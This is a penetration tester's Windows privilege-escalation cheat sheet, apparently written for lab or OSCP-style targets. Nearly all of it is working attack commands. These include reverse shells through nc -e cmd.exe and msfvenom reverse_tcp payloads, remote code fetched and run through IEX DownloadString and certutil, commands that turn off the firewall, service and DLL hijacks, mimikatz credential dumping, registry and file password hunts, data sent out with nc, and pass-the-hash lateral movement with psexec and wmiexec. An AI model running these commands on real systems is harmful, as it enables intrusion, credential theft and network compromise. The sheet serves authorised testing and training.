================================== 
doskey ll=dir /a $*

================================== 
whoami
hostname                    
echo %username% 
net users 
net user mike 
net user Administrator 
net group "Domain Admins" 
whoami /priv                         ..impersonate=juicy/printspoof
reg query HKLM /f pass /t REG_SZ /s  ..pw search
echo %path%                          ..could lead to dll hijack

================================== 
Files

dir /a                ..hidden files
dir /r                ..alternate data stream

cd C:\ & dir /a
dir /a C:\Users
tree /a /f C:\Users\ 

cd C:\$Recycle.Bin & dir /a 
type c:\Windows\win.ini   
type c:\Windows\System32\drivers\etc\hosts  
type c:\Windows\System32\License.rtf 
dir /a C:\inetpub\
dir /s web.config

cmdkey /list          ..quick check


================================== 
Kernel Exploits
 
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

Google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities"
 
systeminfo > systeminfo.txt 
kali> wes.py --update 
kali> wes.py systeminfo.txt --exploits-only --color -o wes-exp.csv 
 
 
================================== 
Network
 
ipconfig /all 
netstat -nao 
netstat -pantu 
netstat -nat | findstr LISTEN  
route print 
 
 
 
================================== 
Cred Hunt
 
type c:\sysprep.inf 
type c:\sysprep\sysprep.xml 
type c:\unattend.xml 
type %WINDIR%\Panther\Unattend\Unattended.xml 
type %WINDIR%\Panther\Unattended.xml 
 

================================== 
Services 
 
tasklist /V 
tasklist /v /fi "username eq system" 
tasklist /v | findstr /si "system admin"  
tasklist /SVC
 
sc query state= all
wmic service list brief  
wmic product get name, version, vendor 
wmic qfe get Caption, Description, HotFixID, InstalledOn 
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 
 
icalcs C:\Barracuda\bd.exe 
copy /Y C:\xammp\htdocs\shell.exe C:\bd\bd.exe 
shutdown -r 
nc -nvlp 445 
 
 
 
================================== 
Tunnel an Internal Service
 
netstat -nat | findstr LISTEN | findstr 127 
127.0.0.1:8080 LISTENING 
 
Share
cd ~/tools/privesc_windows  
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/chisel-amd64.exe  
 
Connect
kali> chisel-linux64 server --reverse --port 443  -v
wind> chisel-amd64.exe client 192.168.162.46:443 R:8080:localhost:8080  
kali> firefox 127.0.0.1:8080   
 
 
==================================  
set 
set path 
set username 
 
==================================  
netsh firewall show state  
netsh firewall show config 
netsh advfirewall show currentprofile 
netsh advfirewall firewall show rule name=all 

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off  

 
================================== 
mountvol 
driverquery /v 
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 
 
================================== 
AlwaysInstallElevated
 
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer 
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer 
  
 
 
================================== 
Tasks 
 
schtasks /query /fo LIST /v 
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

 
 
================================== 
Software
Installed Programs have vulns/configs/creds
 
dir /s "c:\Program Files" 
dir /s "c:\Program Files (x86)" 

dir c:\*vnc.ini /s /b 
dir c:\*ultravnc.ini /s /b  
dir c:\ /s /b | findstr /si *vnc.ini 
  
reg query "HKCU\Software\ORL\WinVNC3\Password" 
reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly"
vncpwd.exe <pw found>

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 

search -f *pass* 


================================== 
Startups

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

 
================================== 
Logic Plan 
 
Metasploit > getSystem (NamedPipe)
PrintSpoofer/Juicy/Rotten Potato 
UACBypass 
System Processes 
 
================================== 
Keep a List: 
 
1. Web Application - IIS 
2. Web Server - 80 http  
3. Samba 445 - EternalBlue? 
4. Microsoft SQL Server 2017 RTM 14.00.1000.00  
5. Remote RDP-3389, Winrm-5985  
6. Windows Server 2016 Standard 14393 (6.3) 64 bit 
 

 
================================== 
Search
 
findstr /si password *.txt 
findstr /si password *.xml 
findstr /si password *.ini 
findstr /spin "password" *.* 
search -f *pass* 
 
dir /s *pass* == *cred* == *vnc* == *.config* 

c:\sysprep.inf  
c:\sysprep\sysprep.xml  
c:\unattend.xml  
%WINDIR%\Panther\Unattend\Unattended.xml  
%WINDIR%\Panther\Unattended.xml  
dir /b /s unattend.xml  
dir /b /s web.config  
dir /b /s sysprep.inf  
dir /b /s sysprep.xml  
dir /b /s *pass*  
  
================================== 
Search Registry for Passwords

reg query HKLM /f password /t REG_SZ /s 
reg query HKCU /f password /t REG_SZ /s 
 
 
================================== 
Autologon Creds 
 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" 
 
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" 
 
  
================================== 
Saved Creds 
 
cmdkey /list 
runas /savecred /u:administrator cmd.exe
runas /savecred /user:admin C:\PrivEsc\reverse.exe 
C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.162.46 4444 -e cmd.exe" 
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv 192.168.162.46 80 -e cmd.exe"
 
  
================================== 
Credential Manager 
 
dir c:\users\username\appdata\roaming\microsoft\credentials 
type "%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" 
type "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"  
Check for credentials in .rdg files 
 
 
================================== 
SAM - Quickcheck

dir %SYSTEMROOT%\repair\*S*
dir %SYSTEMROOT%\System32\config\RegBack\*S*
dir %SYSTEMROOT%\System32\config\*S*

Consider: mxsam

================================== 
Unquoted Service Path PrivEsc

searchsploit foxit 7.
dir "C:\Program Files (x86)" 
sc qc FCUpdateService 
wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """ 
echo ok > "C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\test.txt"
echo ok > "C:\Program Files (x86)\Foxit Software\Foxit Reader\test.txt" 
echo ok > "C:\Program Files (x86)\Foxit Software\test.txt" 
echo ok > "C:\Program Files (x86)\test.txt" 
msfvenom -p windows/shell_reverse_tcp -f exe --platform windows -a x86 LHOST=192.168.162.46 LPORT=444 > rev.exe 
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.162.46/rev.exe', 'C:\Program Files (x86)\Foxit Software\Foxit.exe')" 
shutdown -r -t 10 && exit 
nc -nvlp 444

================================== 
DLL Hijack
Example: Vista/Win8

sc query IKEEXT          ..Want LocalSystem 
c:> dir wlbsctrl.dll /s  ..Want Missing 
echo %path%              ..Want Exploitable-Path 
cacls "C:\Python27"      ..Want Authenticated Users (M) 
accesssschk.exe -dqv "C:\Python27" 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.162.46 LPORT=445 -f dll > shell.dll  
copy shell.dll C:\Python27\wlbsctrl.dll 
shutdown -r -t 10 && exit   
rlwrap nc -nvlp 445 


================================== 
TOOLS 
 
cd ~\tools\privesc_windows
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support
cd C:\windows\temp\
cd C:\Users\Bob\Downloads\ 
copy \\192.168.162.46\share\*
 
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/winPEASx64.exe 
certutil -urlcache -split -f http://192.168.162.46:80/chisel.exe 
certutil -urlcache -split -f http://192.168.162.46:80/mimikatz_64.exe 
certutil -urlcache -split -f http://192.168.162.46:80/PowerUp.ps1 
certutil -urlcache -split -f http://192.168.162.46:80/SharpHound.exe  
certutil -urlcache -split -f http://192.168.162.46:80/nc.exe 
certutil -urlcache -split -f http://192.168.162.46:80/Invoke-Kerberoast.ps1  
 
Powershell
powershell.exe -nop -ExecutionPolicy bypass  
IEX(New-Object Net.WebClient).downloadString('http://192.168.162.46:80/PowerUp.ps1') 
 
 
================================== 
Quick-Paste-Report
https://pentest.mxhx.org/07-win-privesc/win-enum#quick-paste-report 
 
 
================================== 
winPEAS
Favorite tool for a big variety of PrivEscs
 
Enable Colors
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
winPEASx64.exe 
 
Found:
Writable service binary/dll/unquoted 
BarracudaDrive 'bd' Service 
icalcs C:\bd\bd.exe 
copy /Y C:\xammp\htdocs\shell.exe C:\bd\bd.exe 
shutdown -r 
nc -nvlp 445 
 
 
 
================================== 
PowerUp 
 
ALL common Windows privesc (bypassuac, service-abuse, gpp-passwords, tokens) 
Dev branch has extra checks – Can find 'SeImpersonatePrivilege' tokens too 
Look for services running as 'System'. 
 
powershell.exe -nop -ExecutionPolicy bypass  
IEX(New-Object Net.WebClient).downloadString('http://192.168.162.46:80/PowerUp.ps1') 
Import-Module .\PowerUp.ps1 
Invoke-AllChecks 
 
  
================================== 
WES – Kernel Checks 
 
cd C:\Windows\Temp
systeminfo > systeminfo.txt 
 
Kali:
wes.py --update 
wes.py systeminfo.txt -o wesall.csv 
wes.py systeminfo.txt --hide "Internet Explorer" Edge Flash 
wes.py systeminfo.txt --exploits-only --color 
 
REF:
https://github.com/bitsadmin/wesng/blob/master/CMDLINE.md 
 
 
================================== 
Checklists: 
 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://book.hacktricks.xyz/windows/active-directory-methodology 
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet 
https://github.com/mchern1kov/pentest-everything/blob/master/privesc/windows/README.md 
https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/ 
 
 
================================== 
Refresh Tools (this needs work)
 
git clone https://github.com/carlospolop/PEASS-ng/releases/ 
linpeas.sh 
winPEAS.bat 
winPEASx64.exe 
winPEASx86.exe 
 
git clone https://github.com/PowerShellMafia/PowerSploit -b dev 
PowerUp.ps1
 
git clone https://github.com/bitsadmin/wesng --depth 1 
wes.py
 
 
 
================================== 
mimikatz 
 
mimikatz_64.exe              ..as admin if you can 
privilege::debug  
token::elevate  
sekurlsa::logonpasswords     ..anything good?  
sekurlsa::dpapi              ..extract DPAPI masterkeys 
 
dpapi::rdg                   ..decrypt .rdg files (needs masterkey) 
 
lsadump::sam                 ..NTLM 
lsadump::cache               ..MsCacheV2 might crack  
lsadump::secrets             ..WOW saved creds!!  
lsadump::lsa /inject         ..? 
 
sekurlsa::tickets            ..roast  
kerberos::list /export       ..after requesting ticket w/powershell  
klist  
 
================================== 
mimikatz powershell
powershell -ep bypass .\Invoke-Mimikatz.ps1

 
================================== 
Bloodhound 
 
locate Sharphound.exe 
python3 -m http.server 80
powershell wget 192.168.162.46:80/SharpHound.exe -O SharpHound.exe 
SharpHound.exe --CollectionMethod All 
 
nc -nvlp 445 > bloodhound.zip  
nc.exe -w3 192.168.162.46 445 < 20221111_BloodHound.zip  
sudo service neo4j start 
http://localhost:7474/browser/  
./bloodhound & 
Right-side menu >  Upload Data > sharphound.zip 
Analysis > Find Shortest Path to Domain Admins 
 
 
================================== 
Ping for Nearby Machines: 
 
for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.200.%i > nul && echo 192.168.200.%i is up  

 
================================== 
Remotes 

psexec mydom/administrator:"password!"@192.168.200.5
psexec admin@192.168.200.5 -hashes aad3b435b51404:ee0c207898a5bc   
psexec mydom/bob:Paxxword@192.168.200.5
dcomexec.py mydom/administrator:"password!"@192.168.200.5
smbexec.py mydom/administrator:"password!"@192.168.200.5
wmiexec.py mydom/administrator:"password!"@192.168.200.5
atexec.py mydom/administrator:"password!"@192.168.200.5 "whoami" 
 
 
==================================  
Usernames 
List of Users > Convert to usernames 
https://github.com/PinkDraconian 
Then Kerbrute, if you get a list of users. 
 
 
================================== 
Windows 
type proof.txt && whoami && hostname && ipconfig 
 
 
================================== 
Consider
mxsam mxpivot mxtransfer

